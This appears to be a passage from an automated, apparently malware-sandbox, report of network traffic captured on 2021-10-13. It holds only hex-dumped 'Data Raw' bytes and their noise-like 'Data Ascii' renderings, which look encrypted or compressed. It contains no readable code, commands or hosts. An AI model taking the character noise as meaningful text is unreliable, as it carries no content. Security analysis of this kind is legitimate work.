c3 55 27 ee 24 f6 8a 6a 36 dd af ca 5d c8 66 5e fa a9 a5 77 c3 fe 48 73 6c 14 23 c1 b1 b2 48 2b b1 a6 5f 7e fb 5c c4 5a e4 b7 05 58 e9 b0 06
                                                                      Data Ascii: ~3L" zGAauJ MA>0faP@](vJn;$eyLFB>98Nf ;mY(]ZeT>\@{QbhCd`GmoxP]i&k?K0yXyU'$j6]f^wHsl#H+_~\ZX
                                                                      2021-10-13 16:06:31 UTC148INData Raw: 62 3c 8f 1d 45 c6 bc 2d 85 6d 74 d9 ef c6 0c ac d2 6f d0 05 66 a1 b3 89 20 3e 6a 4e 2c 90 2d d3 0b 9e a5 89 df 84 61 fb 48 53 e1 fa 4f 91 fc 3b b9 d7 03 e1 35 be 02 65 ba dc bd b6 7f 75 34 7d 4e 80 b4 e7 26 dc b7 0b 09 8d c4 4d d2 8b ac ce 05 42 d7 7e 1e 94 f4 ee 3c 35 2b 01 74 a4 8f 85 44 11 a1 16 cf e2 9c e7 b8 8d a1 fc 72 03 d8 6f 9f 4a 11 5b 69 8c 0f 8f 2f 7b 26 10 cd 76 07 ff b2 70 57 9c 27 75 7b 1c 72 e5 96 43 f1 29 b4 1c 0a f3 87 cb c9 9d 42 a1 e5 83 8a 85 10 bc 36 bb 13 84 57 d2 c1 10 0a c6 8e 8b e9 26 3e f6 28 bd 61 0d 80 6a a2 34 8f bd 02 2f 90 34 2c 75 01 cb e2 17 8b f3 76 c6 a5 47 53 e0 b3 a3 dc 4b 9e 58 ee 58 48 28 8b 63 b2 5d bc 92 c5 f1 f7 e1 18 bf fc c2 5e 89 df c3 fa 60 f2 7d 86 2f 75 b7 fe 3a 04 ac 8d 05 4d 09 0a a8 63 3a 93 bf 71 ef 21
                                                                      Data Ascii: b<E-mtof >jN,-aHSO;5eu4}N&MB~<5+tDroJ[i/{&vpW'u{rC)B6W&>(aj4/4,uvGSKXXH(c]^`}/u:Mc:q!
                                                                      2021-10-13 16:06:31 UTC150INData Raw: fb c9 e8 cb 56 d8 ad 06 85 68 39 98 cf 9f f0 aa 69 15 d5 87 50 78 fa 7b 50 f7 a8 a6 71 e9 58 29 c7 6d 14 38 f0 25 9d 4a 2b 2d a9 f4 12 44 7d 78 5c c4 b3 26 4f c1 2a 23 6b 2b 84 84 e9 13 b2 18 1f 7c 06 5b f4 fe d2 1f 42 f9 7a ec 81 cc 60 38 c5 5c 6c eb f9 1d 86 38 70 1a 8a b9 69 fa 57 28 2a d8 72 22 11 d3 dc f5 2e 12 a2 06 d2 9f 15 47 5b c4 f9 a9 80 13 5e a5 2b 67 2a da e1 c0 80 68 d2 eb fb cb 54 38 c9 66 1f 3c b9 ac 39 ba 09 ee 3d c0 56 c5 63 8b 71 11 97 da eb 61 80 58 78 60 ba 9c 1a 2d 01 b9 28 5e c5 7e 10 71 6d cb d2 b7 d7 8a d8 f9 58 be 43 0c 1d 15 f8 79 71 4e 6e 0a 0c 58 80 72 9d 3c d2 9d d0 65 7d 3d 39 cd ed d4 e8 26 5a 73 73 a3 29 89 e7 56 be 50 55 60 db 50 77 4b b7 47 ea 50 71 f6 5e 87 0d 6c dc 74 30 ad d5 aa 9a a1 ae 6b 0e 0f aa 6a e0 74 8e eb e7
                                                                      Data Ascii: Vh9iPx{PqX)m8%J+-D}x\&O*#k+|[Bz`8\l8piW(*r".G[^+g*hT8f<9=VcqaXx`-(^~qmXCyqNnXr<e}=9&Zss)VPU`PwKGPq^lt0kjt
                                                                      2021-10-13 16:06:31 UTC151INData Raw: 94 fc 42 57 37 55 f5 23 4c 05 57 d0 b4 0d c0 cc c7 29 04 df 48 7f 55 d9 2c b9 7f c1 07 6e d5 4e 8f 5e d2 0f a0 fe 0f 52 ac 3d 63 bb b1 f0 aa 93 f7 d6 8a 22 df 14 99 7d 8c 6f ec 21 a4 2a cc dd 01 7c ab f4 f9 05 e8 c9 18 a6 0f ca eb 53 dc d7 fe e9 cf 5a 45 20 d4 80 1c 19 54 a5 de d0 0a ea 36 62 85 56 03 b6 d4 9e 25 7c 5b cd 2a a9 22 29 71 39 22 15 66 ce 6d bb 47 87 63 6d 7c bd 9c f8 13 fd 96 33 f8 3a 5b 58 5d 1a 0e cd b2 57 b7 4f 64 87 84 7a 46 67 73 7a c0 82 a5 40 eb de 6c 37 04 d0 b1 9d ea f9 c2 41 21 f6 f8 00 fd ef 53 ac be b5 a9 2e 54 69 4e 0f 5a e6 91 0f 2a 39 97 34 48 5f fc 4c b7 87 44 22 69 27 05 06 62 e2 a8 36 d9 ff 39 05 14 41 62 47 91 bb d9 2d e3 b2 55 f3 71 3c b1 22 92 6c ce de 5c 11 c7 4e 15 b7 30 34 66 1d 9b 03 8e b5 e9 fe ef 69 db 8d 34 03 e3
                                                                      Data Ascii: BW7U#LW)HU,nN^R=c"}o!*|SZE T6bV%|[*")q9"fmGcm|3:[X]WOdzFgsz@l7A!S.TiNZ*94H_LD"i'b69AbG-Uq<"l\N04fi4
                                                                      2021-10-13 16:06:31 UTC152INData Raw: 20 29 d0 d0 82 82 65 4f 45 6b a1 e0 60 84 88 84 35 4e f9 04 fc f3 e6 e2 c1 fe de 12 f1 a6 0a 3c 99 04 95 7b 24 9c 38 43 ca bb e3 92 a0 cd bb 3c df f3 21 a8 3c e4 97 ed 0d 0b 41 d5 3b 7e fa be e4 0c d8 32 cf 2b e4 fe 7c 35 ce 37 59 10 fd 69 f5 04 56 56 70 f1 98 ee c4 6b 97 88 b4 e1 9c 46 6a 64 d4 b2 77 fa a1 6c 3a ae 99 65 6a a6 25 8a 43 b9 d6 f7 81 a5 8a ff 60 e9 31 af a2 90 ad 26 52 5f 56 3f c2 26 d9 14 ba 82 ba d8 23 24 4a 70 64 cf ea bd 8e da 0b 10 ca 16 c2 26 ae 06 e2 71 1a 5e 0e 9b bb d4 b1 94 38 0b 70 b5 13 48 51 a2 cc 12 9e 44 62 a3 1c dc 9d 9d 8d e2 40 76 26 05 d3 ce eb ae 0c 48 6a ab e8 1e 8c 26 02 6b 1b 63 fe 6f 99 80 f3 27 b1 b1 be e2 e3 0d 4c af 4c bb dd 79 98 0f d2 a1 2e 17 e5 d8 02 a5 dd de b9 fe 77 32 7d 5d 39 2a 9f db 57 e3 52 56 0d 6b 6a
                                                                      Data Ascii: )eOEk`5N<{$8C<!<A;~2+|57YiVVpkFjdwl:ej%C`1&R_V?&#$Jpd&q^8pHQDb@v&Hj&kco'LLy.w2}]9*WRVkj
                                                                      2021-10-13 16:06:31 UTC153INData Raw: 5a 5c 53 5d 73 fe 7d 33 82 48 67 a8 d4 9e 85 b9 98 7b 1c 7f fc 03 44 b5 44 e6 da 19 d4 7e c2 66 75 d4 e9 36 f5 9a 21 ad e8 c6 a6 05 96 19 0e 53 5b 56 c4 0e 52 9c a2 5e a8 1a e0 44 e3 90 51 da d3 1a 72 07 ae f0 e8 2f 20 34 e3 53 e4 75 55 af 8a dc cb 5c 96 ee 06 18 79 d5 3b 2c 07 eb 80 47 c1 e6 03 4a ea 3c 55 dc ee cc 8c 54 f8 83 2c 9d 92 23 65 ba ea cc b0 04 79 a9 e6 ed 46 bc 47 1a a9 9b 9d 4b c8 ec a1 24 ab d4 fc 6d c3 7d 87 e4 f8 18 f7 eb 48 f6 a1 81 6b 3f b8 cd 07 44 84 c6 f5 28 3c 3f ca 56 e7 89 f9 c3 bb 16 18 61 d7 80 16 93 1f 12 ed a7 0a 6c a7 97 62 56 a1 2a d0 3c 9f 00 41 e7 60 de af ac 45 82 b0 b6 51 50 7d e1 b8 06 8f 59 0e f8 18 fe 94 36 34 19 f8 9c 77 e5 ed 00 39 0a 5a 50 ac 7a 4e 5b 70 86 c6 49 cb ab 90 1f 2f ec 1b bc 5d bb bb 95 ec d2 39 d5 df
                                                                      Data Ascii: Z\S]s}3Hg{DD~fu6!S[VR^DQr/ 4SuU\y;,GJ<UT,#eyFGK$m}Hk?D(<?ValbV*<A`EQP}Y64w9ZPzN[pI/]9
                                                                      2021-10-13 16:06:31 UTC155INData Raw: 04 40 e1 67 bb 8d c4 b4 da 1f d2 73 6e 27 fd 78 60 64 42 13 9b cd 40 e8 64 29 a2 5a a7 0b 55 de a0 2a 29 eb 54 13 09 61 04 9c c5 f1 de bb aa 15 3b fa 67 ca c3 93 de b8 ea 9f b9 ae f8 a1 11 96 39 f9 71 8e f8 1c 01 ff 8e 93 f1 33 08 54 6e 21 48 29 a4 74 43 1d a2 92 ab 7e bc 53 0e 39 8e a1 8f 64 c4 eb 34 a5 db 3c 12 dd 8f d8 b1 a5 5d 47 14 5c d0 b5 10 a5 cb c9 28 72 ca 35 4a 1d ec 49 c3 11 96 46 62 b4 07 b3 36 a1 7c 96 8c 52 07 fd 3c 1f d8 cc f5 bb 90 f2 cd 84 23 e0 e9 75 9f 18 c6 01 d0 33 89 38 36 ed b6 66 34 3c cd 2f 36 f9 2f f0 10 67 af 09 06 75 6d 46 92 c0 f5 2c 2f 81 d1 a3 51 39 20 e0 44 cb c1 5a bb cc 60 34 4a ed a7 d1 52 87 0e e8 db f6 f2 ce 8f e3 5b ca 74 8a 27 8b f6 c1 37 73 26 92 6a 63 8d 32 c4 51 57 04 5a 2e b7 b7 41 aa 2e 07 cb 9b 03 19 12 14 13
                                                                      Data Ascii: @gsn'x`dB@d)ZU*)Ta;g9q3Tn!H)tC~S9d4<]G\(r5JIFb6|R<#u386f4</6/gumF,/Q9 DZ`4JR[t'7s&jc2QWZ.A.
                                                                      2021-10-13 16:06:31 UTC156INData Raw: 5f bf 27 13 69 bb a8 94 51 48 f5 25 e7 d0 6d fc 4e 7b c2 84 cd 76 6f e0 1f 22 f6 d1 c0 d3 ae 4d db ea a1 87 4a 53 b2 64 56 70 f0 a4 46 96 54 b5 3b 1f 76 74 64 a4 4a 0d b0 f9 c3 5e 79 56 78 58 81 b9 36 0b 33 90 7e 34 d0 49 23 6f 7b d8 e2 90 f3 84 6e a3 f5 66 9b cb f1 ca 64 b8 bd 05 9c e2 ce 87 77 bf 48 f5 19 6d 7c 97 b1 e4 c7 24 12 0a 2d ab ef 6f 93 99 ce 60 19 8c 5d ad 87 92 a3 86 a8 af 7e 91 07 ba 8f 31 97 16 d4 94 27 cb ce 67 06 4b 63 57 62 3a b3 50 69 ad 7e cb 0c 55 69 9d 8f c4 43 b8 ee 2e 5f 03 fa 37 c8 21 d0 5c 48 e0 8b 62 9c f6 cc 3f bd 7d 9c b3 9b a5 30 43 2d 19 bc 5f 6b 78 11 7f d6 ec ed 3e 30 d1 52 07 c2 99 15 2e 8f e4 1d 69 de 39 f1 94 b3 99 cc c4 ae 39 a4 77 f2 f5 f3 c1 58 62 50 5e 39 9a 18 e1 3b 86 bd c4 ea 18 00 41 01 37 8d a3 ee d2 90 50 4c
                                                                      Data Ascii: _'iQH%mN{vo"MJSdVpFT;vtdJ^yVxX63~4I#o{nfdwHm|$-o`]~1'gKcWb:Pi~UiC._7!\Hb?}0C-_kx>0R.i99wXbP^9;A7PL
                                                                      2021-10-13 16:06:31 UTC157INData Raw: 5f 10 dc 01 5d f2 8a fb 76 35 49 c9 5c e0 0c 40 13 0a 13 36 59 9f 09 ad 76 d3 79 6a 37 92 a2 f6 14 e1 b9 52 fd 08 2e 46 30 6c 1b ff 84 7b b6 4f 7a b0 ed 6e 7b 54 5a 08 a4 96 82 77 e3 34 9c b1 bf 7b 0c 13 64 23 1c 83 91 47 26 dc 3b 61 ca 78 6f 1e 6b 82 9b 6c 5d 0a 54 a7 dd 05 7d 48 e7 51 5e 2e e7 6a 9a a9 79 10 47 5a 56 71 10 e8 c1 23 e3 cd 1b 65 78 28 15 57 9d a2 c8 45 a6 98 16 8f 1a 58 89 6a e3 14 a8 be 31 52 89 23 6a ce 4e 58 26 59 c6 41 e4 b1 f5 e0 e5 66 f7 9e 12 16 f0 01 e2 27 fc 1c 1a db 0a 1e ff a0 99 1c 5f 42 82 cb ca 5f e6 71 ea c5 75 4c 01 0e 8f 12 64 36 2e 55 fa 45 69 3e 9e a9 06 bd bb 45 20 ea 0b 27 89 a7 9f bc 20 82 f9 5c fb 9d 04 52 98 df a4 c4 04 7d ae f0 b5 25 b5 19 29 b4 cc d7 06 b1 3b 58 81 19 64 4a 8a 3f d9 22 4c 00 c1 01 09 bf 0c 60 0e
                                                                      Data Ascii: _]v5I\@6Yvyj7R.F0l{Ozn{TZw4{d#G&;axokl]T}HQ^.jyGZVq#ex(WEXj1R#jNX&YAf'_B_quLd6.UEi>E ' \R}%);XdJ?"L`
                                                                      2021-10-13 16:06:31 UTC159INData Raw: 72 75 b8 ab 43 e2 a8 6f 21 b7 87 18 74 8b 19 a0 7e 8b c0 ea e6 be bd c1 4b d0 26 a0 91 99 b7 31 19 7b 49 0a bf d5 39 eb 42 4e 58 3c cc c8 b5 88 90 2f 18 7e 7d 03 d9 c4 08 c5 1e fd 66 23 80 55 38 78 07 b2 9c ed 86 a9 55 60 0b d8 32 43 4f 92 e7 2c ac 3d 56 b4 11 f2 a3 be a5 c6 77 1c 0b 41 88 8c d0 af 05 23 0f c5 8b 14 b0 7a 65 22 51 06 85 4b e3 f0 83 7a e8 d5 d0 86 c8 53 08 86 07 8b de 7a 84 55 d0 99 0c 23 dc c5 1c 96 ff f3 af d3 4f 5a 44 22 19 0a b4 8a 4c d6 6e 78 21 63 3b 44 2d 1b 1b 48 37 40 c6 72 b9 26 88 8c 4e 77 b9 ec da aa 5b 60 27 03 78 2a 55 d7 55 39 62 d1 eb db 1b a3 69 06 56 c3 9e ac 71 dd e3 30 a2 cb 07 1a a8 f1 ca 84 14 ef a2 eb b7 22 59 e7 2d 1e 0d cf e0 26 b6 a0 91 7a 86 13 ca 00 ba d2 5b d0 6c e7 6a bc 4b 60 a6 e5 39 9b ca 0e 3f 58 03 28 57
                                                                      Data Ascii: ruCo!t~K&1{I9BNX</~}f#U8xU`2CO,=VwA#ze"QKzSzU#OZD"Lnx!c;D-H7@r&Nw[`'x*UU9biVq0"Y-&z[ljK`9?X(W
                                                                      2021-10-13 16:06:31 UTC160INData Raw: af e0 26 75 99 6b 58 f7 fc c1 c0 4e d3 66 c8 64 28 9c c0 16 1c 3c 5a a5 d9 5d 0a 4c 8d 1e b7 bc 00 74 77 a8 76 f0 a7 72 f2 88 af 7c 9a 14 e9 81 d2 6c 8e 93 27 91 89 bc 47 0b 80 e3 6a 00 a2 f7 82 6c 49 18 fb 41 ff ca fd f4 a2 14 11 5b b2 e2 66 b4 44 24 c4 99 31 57 81 ef 5e 6a 9a 05 fd 2e a2 30 37 c7 19 9c ab ae 5b cd fa af 18 2a 0e 9a 87 33 a2 70 33 c3 3e 81 fd 4a 0f 7e ca ad 19 92 ca 0f 1e 43 6e 12 fa 76 50 0d 5e d2 d2 b9 3e 52 78 b8 86 5b fa 45 bd 52 11 7a 5b 3e c3 23 3b 88 cd a6 7e 0b 2f 47 60 f0 eb 42 61 50 e8 5d 61 85 0e 7d 08 28 82 bc 9a a9 cc 30 a2 e5 fb 68 23 67 35 d4 25 5c fb 1d 05 3e 2a 87 59 cc 18 8d 97 9d 62 57 17 0f a0 e7 db ec 32 41 fb 1d 37 7b bb f5 6b ac 54 66 7b 66 48 63 79 b2 55 e3 47 59 d1 53 f0 01 45 e4 51 21 b4 dd b5 98 8f b7 c6 46 a2
                                                                      Data Ascii: &ukXNfd(<Z]Ltwvr|l'GjlIA[fD$1W^j.07[*3p3>J~CnvP^>Rx[ERz[>#;~/G`BaP]a}(0h#g5%\>*YbW2A7{kTf{fHcyUGYSEQ!F
                                                                      2021-10-13 16:06:31 UTC161INData Raw: 2d f8 5c 60 96 1d 7c 8c ab 12 6c 7c 02 be 63 0e 53 12 8d ef 5e f8 e9 b1 0d 2f e5 3d 7a 10 df 29 a9 6b ed 6b 1f f6 67 c0 53 9d 52 b3 db 47 0f b7 22 21 b4 a5 ef d4 f4 97 df bd 12 84 de 4d a7 51 b5 00 eb 79 b7 00 05 cb 8d 4d 2b 0a ca 66 04 96 36 f5 7f 2b 93 2d 02 56 4b 6b ad 9b ef 03 1c f8 d5 b4 6f 1f 0d c2 6c b3 ad 09 85 b3 19 7a 5f ac e7 90 15 ca 0e 00 46 4a 4c 4f 6f 40 c4 60 95 71 cb 71 2f 3f bb 85 94 0e f5 88 79 97 2e 4f 46 1e 43 35 dc a0 51 f9 25 0a e1 b8 23 3b 39 7f 4f eb b2 8f 7d e7 c5 69 12 0e c2 bc d2 ab c8 fb 77 1a f8 90 62 d5 b2 3c bb a5 d9 b8 1e 67 fc d0 9b c0 7d 19 fe ef ff 0b ef a1 9c 32 9d 35 4a 8d e8 a1 bb b0 eb a0 3c 1f ec 36 4d c1 a5 b9 a8 9a ab 5e 7d 5c ce 24 6a 84 3c b2 d9 43 db 6a 8f 25 3a 83 91 13 8a 9b 2b 23 58 7e 66 82 15 91 d8 94 9f
                                                                      Data Ascii: -\`|l|cS^/=z)kkgSRG"!MQyM+f6+-VKkolz_FJLOo@`qq/?y.OFC5Q%#;9O}iwb<g}25J<6M^}\$j<Cj%:+#X~f
                                                                      2021-10-13 16:06:31 UTC162INData Raw: 59 15 c1 9c 56 6e b7 05 6a 7c 32 00 f3 8f ff b3 cf ae 2a 33 ea 8c 01 02 5b 03 45 10 7f 61 68 36 76 f7 69 e5 26 b2 00 16 d8 f5 30 76 58 18 ff cd a4 8e e7 fa f9 6d a2 a4 ca 6f 46 67 a9 7e d7 e9 bc 0f 38 0f fc 56 49 a6 30 4b a2 a6 34 65 5e 0f b0 4b 28 6a 20 8d 8e 06 c3 d2 9e 1d 1e d4 5b 7b 75 bc 0a 9f 56 d7 49 6e c2 49 f0 4f fb 3f 9e f2 28 7a a4 1d 49 b8 a6 e2 b1 96 e5 d9 9e 3e 88 bf 62 95 66 c5 1f d6 41 b0 23 23 ea 8c 7e 2a 2c c5 42 3b c1 4e e7 86 fc 5a de d7 bf bb 93 4b 49 4c e7 e3 1b 2e 77 86 e0 f7 05 98 03 43 a7 62 1a 82 c5 b7 00 5a 2c 8e 03 9f 63 3a 64 62 6a 0a 68 ae 54 ea 0e a5 00 06 42 db e3 ba 7a 87 ec 2b a1 5c 39 07 4d 0e 70 df a2 54 b1 4b 70 83 d3 4c 52 40 5d 7e 9d ad 89 64 e0 c0 70 08 1d fb 93 e3 8f e4 c9 2c 42 88 f5 b1 6e 87 20 96 c1 c3 bf 12 e1
                                                                      Data Ascii: YVnj|2*3[Eah6vi&0vXmoFg~8VI0K4e^K(j [{uVInIO?(zI>bfA##~*,B;NZKIL.wCbZ,c:dbjhTBz+\9MpTKpLR@]~dp,Bn
                                                                      2021-10-13 16:06:31 UTC163INData Raw: e1 a0 48 94 c8 84 cf 72 68 1d 66 da 39 bc 84 05 90 95 ef 1d 42 8e 55 fe 8c 7f 31 2a ed 5e 47 08 7d 44 6e 8f 97 0f 2e d5 9d 1b 2a fa 7e bf 45 77 cb c2 b7 52 93 49 ac d3 bf 5a 20 2e 36 fd 79 50 cb 8e 3d 1b 7e 65 64 5b 26 d4 bd d3 47 b8 27 37 e5 66 cb ec 29 62 f5 36 2a 2c 80 98 74 6d 4e 55 60 47 75 b2 4d c5 57 e5 53 7c d4 3e d9 36 6c b3 5a e4 ad fe a8 05 b7 41 f7 66 96 6e 42 02 7c 92 e8 a6 17 fb 7e c7 2e c2 b4 00 92 76 b9 7d 81 89 c7 d8 2d 27 ad 85 31 63 94 80 da 47 15 3c 1d 9b f0 58 ae 02 eb ea d1 b1 d7 d4 53 63 a4 8b 69 ef b0 69 2c b1 b2 29 5f 07 30 95 64 ba db 25 db 82 a0 ed 7d b2 04 ae 8a a1 89 23 31 55 67 26 8f 26 d5 ba 9b af 8f 69 0e 83 65 5b 53 53 f3 86 ba e2 3b ca f4 6e c0 0d 9e fa 68 fa ef 9b f5 62 55 49 7f 41 a8 25 ff e3 c0 9b 8d 68 08 00 57 d0 ab
                                                                      Data Ascii: Hrhf9BU1*^G}Dn.*~EwRIZ .6yP=~ed[&G'7f)b6*,tmNU`GuMWS|>6lZAfnB|~.v}-'1cG<XScii,)_0d%}#1Ug&&ie[SS;nhbUIA%hW
                                                                      2021-10-13 16:06:31 UTC164INData Raw: ac 02 cc 0a ff 83 77 cf 26 4d 45 6f 46 fd de 2c 54 ba 4a 70 83 17 41 52 40 2c 0a 78 83 37 4b d1 f0 43 39 75 f8 93 e3 92 e0 1e 4c cc 89 f7 1d ed 87 b7 b4 bf c3 36 1d b2 b1 10 d5 82 72 1a ed fe eb 14 b4 a6 9c ef 87 f7 59 8f ff b4 b8 c1 de ba 22 26 c8 de 24 7c 8a 23 84 ba 89 16 5a 3a ef 0f 5d 64 06 00 d2 5a d5 63 97 61 3d 96 e0 23 a6 28 44 4e c0 a9 c6 65 f4 a3 33 71 79 7d f3 b7 36 02 8e 61 8f 7f b9 b7 94 be 6d b1 ad 81 11 99 86 f9 ec 29 3d 6e eb 50 e5 65 44 1c c9 20 9d 0a 90 f5 4b 8f 3b 95 3f 17 40 0a cf a3 d7 fd 1b 4a a1 74 7c fb c9 f7 e1 89 da 16 01 ad ef 47 01 da 84 f4 8a 6b 14 23 87 71 5c d5 68 76 d7 c3 a1 71 e9 79 34 10 6d af 26 e3 0d b0 48 cc 34 83 72 71 dd 76 79 e3 e5 b5 24 4f c1 27 07 46 39 a3 a6 fb 11 6e 19 3d 4c 2b 5b e8 e6 c3 37 72 fb 63 eb 77 4b
                                                                      Data Ascii: w&MEoF,TJpAR@,x7KC9uL6rY"&$|#Z:]dZca=#(DNe3qy}6am)=nPeD K;?@Jt|Gk#q\hvqy4m&H4rqvy$O'F9n=L+[7rcwK
                                                                      2021-10-13 16:06:31 UTC166INData Raw: be 99 02 20 41 5b 23 9c 0b fa 26 b5 8f 9f f7 03 1f c3 4f c6 f8 db 92 24 e0 a3 3e f3 2e 03 0f 0b c2 66 ba 14 b7 e5 56 74 34 8d 6d b8 9b e4 26 0e b2 9d 75 15 c5 ee f5 bb 70 cd 05 e5 40 4b 31 87 d2 cc ec 27 29 00 54 11 ad 95 46 0f aa 64 cf ed 9e e0 92 9a d7 68 71 02 dc 04 74 5b 13 5a f3 74 37 90 0b 5a f9 56 d3 7b 25 a9 99 db 58 90 2a 5c 56 da 53 a8 be c4 8f 86 a9 0c 0c d2 67 ba c7 8b c6 82 ce 33 aa b6 f2 e8 b6 2c 32 a2 62 84 41 13 01 ae bd df 69 e4 15 30 48 72 e0 5f 83 0a 5d 30 89 1f 9e 19 bf 70 8a c2 e1 8d fc 41 2b 9d 5a 82 bb 5e 71 6a 98 b2 de 1b 34 4d 91 89 57 7e 0f 5f 57 17 a2 c4 df 10 db b8 20 c9 9e 92 59 c1 e1 03 51 96 f3 2d b0 04 71 15 fe 03 84 84 94 93 4c 40 34 1d e1 26 94 68 4a 94 b0 06 6f e2 7c b8 a6 c9 97 1d 0f 96 1b 66 61 b0 87 03 75 8f cd f3 0b
                                                                      Data Ascii: A[#&O$>.fVt4m&up@K1')TFdhqt[Zt7ZV{%X*\VSg3,2bAi0Hr_]0pA+Z^qj4MW~_W YQ-qL@4&hJo|fau
                                                                      2021-10-13 16:06:31 UTC167INData Raw: fb 3f f6 cb ac b0 5d bf f8 f2 eb 78 38 71 61 5f b7 5d 07 7d 03 84 6d c8 50 2e d8 37 b0 30 63 97 30 6e 44 2c 8e f2 6d 11 b8 0d 13 1a ab c4 f6 f4 ef 61 ef b9 6e ff 87 1c 9e 68 c6 49 44 9d 7c 94 92 2d c6 69 27 58 4d cf 7e 7d aa 36 47 76 10 85 5c f7 22 2f a3 02 d4 3b 39 d2 27 0b 78 3e 85 00 74 f0 ab 7b b7 cc e0 84 26 8c d5 db d7 9d f4 3a e3 55 33 75 36 72 15 8b 25 be 97 91 2f 6f 4e dd f5 59 92 ea c7 37 9a 7c 5f 42 b0 ba 1d b9 00 29 15 07 e8 e9 11 5d 47 e0 d0 ab d6 92 58 81 c1 7b 42 3a 3f 1b fb 2b 76 e6 49 21 1d 88 a1 48 9c 3a d2 2a b6 36 62 3b 25 72 c1 ef ea 26 70 e9 0a 03 2a 8f e3 a5 b0 61 57 66 41 e2 5b c9 8c 61 e3 c4 70 c4 7c ec 20 70 db 59 00 83 f8 6c 9b 95 86 eb 70 c4 ac 58 e6 52 84 7f e6 62 02 50 c1 b9 55 9d c7 8e 70 a5 58 96 4e db de db 53 88 42 2d 65
                                                                      Data Ascii: ?]x8qa_]}mP.70c0nD,manhID|-i'XM~}6Gv\"/;9'x>t{&:U3u6r%/oNY7|_B)]GX{B:?+vI!H:*6b;%r&p*aWfA[ap| pYlpXRbPUpXNSB-e
                                                                      2021-10-13 16:06:31 UTC168INData Raw: f0 3e 9f 1e c0 de 89 ee 75 46 61 28 6d a2 02 77 b7 f8 10 06 d2 05 24 da 0c f5 43 6d 3a 93 25 54 c2 b0 c2 7f 8f f5 ef c3 93 9c 50 11 c0 9b 90 e0 fd 8f 75 62 5d 21 b6 19 82 8b f1 e3 d7 86 04 51 93 21 58 82 34 d3 b6 aa 7d c5 5f 90 ef 28 7d 66 9a eb 58 17 7e f1 7a f6 1e dd 04 16 6c ef 0b d6 2f 8b 66 d3 61 6c 2b 2c 8c db 21 69 82 67 da 31 4d f1 40 44 32 de a2 44 b1 57 77 24 db 51 52 dc 02 08 a9 83 b9 5b d3 1e 56 df 26 ea 93 ab ef e0 c9 4c 42 99 f5 00 ee 61 22 a4 bf 3f df 1e 65 b1 80 c5 80 83 08 6b e2 fd 14 2c d9 9c 38 87 64 49 8d ae b7 d1 e6 d8 ba 02 58 c8 09 24 eb 9a 81 aa ad e0 64 48 3a 37 6c 5d b3 06 9e c2 58 42 62 11 30 3b 96 64 55 a6 ff 44 d1 d0 ab 51 64 ad 6a 21 71 59 0c f3 68 36 b0 99 64 18 7e 54 66 92 be ed dd ad 62 11 2d 91 fc 7b 28 6b 70 fd 50 91 0c
                                                                      Data Ascii: >uFa(mw$Cm:%TPub]!Q!X4}_(}fX~zl/fal+,!ig1M@D2DWw$QR[V&LBa"?ek,8dIX$dH:7l]XBb0;dUDQdj!qYh6d~Tfb-{(kpP
                                                                      2021-10-13 16:06:31 UTC169INData Raw: f7 41 75 7a 59 87 6f ff 54 2e f9 5b ea d4 fb dc 6b 02 85 f9 a8 0d a6 f8 e2 55 96 17 f3 e4 54 84 e8 e1 1c 8a 57 d2 2e 71 a4 85 12 70 b9 5f af 08 df ea 39 41 ba 65 2b 65 94 15 d6 39 08 3c 05 b5 c7 6c b6 2c e9 f3 cf b1 d7 78 51 00 82 e7 62 53 bf 47 3a a5 9b 3b 5f be 2d c7 4e ca d0 fe c9 b3 89 ff 7d f6 25 b9 a3 f5 8a 71 2a fa 41 09 8f 09 fb 26 9c a6 8f f3 1a 25 47 b8 51 c0 da 92 93 fc 3b 20 f2 68 f0 7f 95 71 68 9f dc 9d f5 54 75 37 62 01 ab fb ee 37 d5 b8 8d 77 14 c5 4d d5 ab 34 cf 74 49 f6 54 16 86 d2 ce e2 37 28 01 52 f0 9e a0 b5 0c 8f 3e e2 e0 9c e1 91 0b 99 66 1f 08 1e 40 65 48 11 5b f3 a9 21 9d 4f 58 9b 19 02 79 02 a8 99 70 57 83 2b 5d 10 1d 03 e8 c0 ca aa b0 de 86 0e d3 67 c9 d8 85 98 a1 4e 91 89 a5 44 9c 36 bb 33 e2 7a ca fb 2a 15 ee 86 89 61 ba 14 70
                                                                      Data Ascii: AuzYoT.[kUTW.qp_9Ae+e9<l,xQbSG:;_-N}%q*A&%GQ; hqhTu7b7wM4tIT7(R>f@eH[!OXypW+]gND63z*ap
                                                                      2021-10-13 16:06:31 UTC171INData Raw: 5d b3 06 8d d3 44 d2 d5 93 13 2a 8a e6 3f a6 ff 44 c2 c1 6f c7 d3 f0 43 30 cd 7f 61 f3 68 36 a3 8f b3 8a 8f a8 45 83 0e 67 ad ad 62 11 3e 87 db dd d9 2c 50 ef f4 f7 79 44 f2 c9 8a 9c 9f 90 4f 43 7c 22 61 2b 17 42 e4 cf 0b d6 68 1b d6 a5 60 78 c7 dc f7 e3 7b da be 00 fd e9 07 1b e4 9f 80 9f 6b 16 d5 87 d9 5d c5 6f 86 c6 81 a5 25 fe 79 36 ea 6d 07 27 7e 0f 6b 4a 01 2b e7 6a 6d dd 7c 78 4b e4 e5 22 d8 db 9a 06 9a 20 a3 a4 ed 10 a1 18 7d 58 f0 59 de e1 9f 2d 6e fb 7a ea b8 4a d7 a3 09 46 42 cb 60 04 87 38 ea 3f b4 ab c2 eb a2 3a 00 d8 f6 7f 3d d3 dc ea 32 3a 05 10 09 9b 15 c1 41 40 f9 a9 84 33 4b a6 bc 66 c0 f7 e6 d2 86 56 d5 e8 fb cb 67 68 d8 60 ef 32 9c 84 74 9b 08 e8 17 42 3b 5c 30 8c c3 35 ba d9 77 44 1b 7d 55 71 8f bc ee 2c 11 b2 22 01 64 58 11 6f 45 e6
                                                                      Data Ascii: ]D*?DoC0ah6Egb>,PyDOC|"a+Bh`x{k]o%y6m'~kJ+jm|xK" }XY-nzJFB`8?:=2:A@3KfVgh`2tB;\05wD}Uq,"dXoE
